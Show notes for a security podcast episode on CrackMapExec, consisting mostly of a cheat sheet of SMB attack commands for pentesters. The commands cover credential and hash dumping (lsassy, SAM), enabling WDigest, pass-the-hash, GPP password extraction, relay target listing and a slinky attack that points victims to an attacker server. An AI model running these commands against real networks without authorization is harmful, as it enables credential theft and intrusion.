7MS #562: Cracking and Mapping and Execing with CrackMapExec
1 min read Podcast, Pentesting

7MS #562: Cracking and Mapping and Execing with CrackMapExec

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

# General enumeration to see if your account works, and where:
cme smb x.x.x.x -u username -p pass

# Check if print services are enabled:
cme smb x.x.x.x -u username -p pass -M spooler

# Check for the nopac vuln:
cme smb x.x.x.x -u username -p pass -M nopac

# Find GP passwords:
cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password

# Get list of targets with smb signing:
cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt

# Set wdigest flag:
cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable

# Dump creds/hashes:
cme smb x.x.x.x -u username -p pass -M lsassy

# Do pass the hash attacks
cme smb x.x.x.x -u username -H HASH

# Dump SAM database:
cme smb x.x.x.x -u username -p pass --sam

# Enumerate SMB shares
cme smb x.x.x.x -u username -p pass --shares

# Conduct slinky attack: 
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

# Cleanup from slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=TRUE